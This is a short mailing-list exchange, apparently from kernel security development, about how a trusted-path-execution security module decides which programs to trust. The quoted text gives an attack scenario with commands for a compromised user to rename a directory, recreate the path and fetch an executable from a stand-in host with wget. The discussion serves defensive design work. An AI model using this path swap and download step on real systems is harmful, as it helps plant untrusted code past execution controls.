> So actually in this LSM it's not so much full paths that are trusted, > rather it checks that the directory containing the program is only > writable by root and that the program itself is only writable by root. > > For example, consider the following: > > /user/ with permissions drwxr-xr-x user user > /user/user-owned/ with permissions drwxr-xr-x user user > /user/user-owned/root-owned/ with permissions drwxr-xr-x root root > /user/user-owned/root-owned/exe with permissions -rwxr-xr-x root root > > currently /user/user-owned/root-owned/exe is trusted because it can only > be written to by root, and the directory it is in can only be written by > root. > > but then user becomes compromised and does the following: > cd /user/ > mv user-owned user-owned-back > mkdir -p user-owned/root-owned > cd user-owned/root-owned > wget www.evil.com/exe > > Now /user/user-owned/root-owned/exe is untrusted and its execution will > be denied unless you put user in the trusted group.
I can cause a lot of mischief just by renaming commands (mv cp rm does't work on must implementations) but yes the root directory check itself should avoid that you are correct.
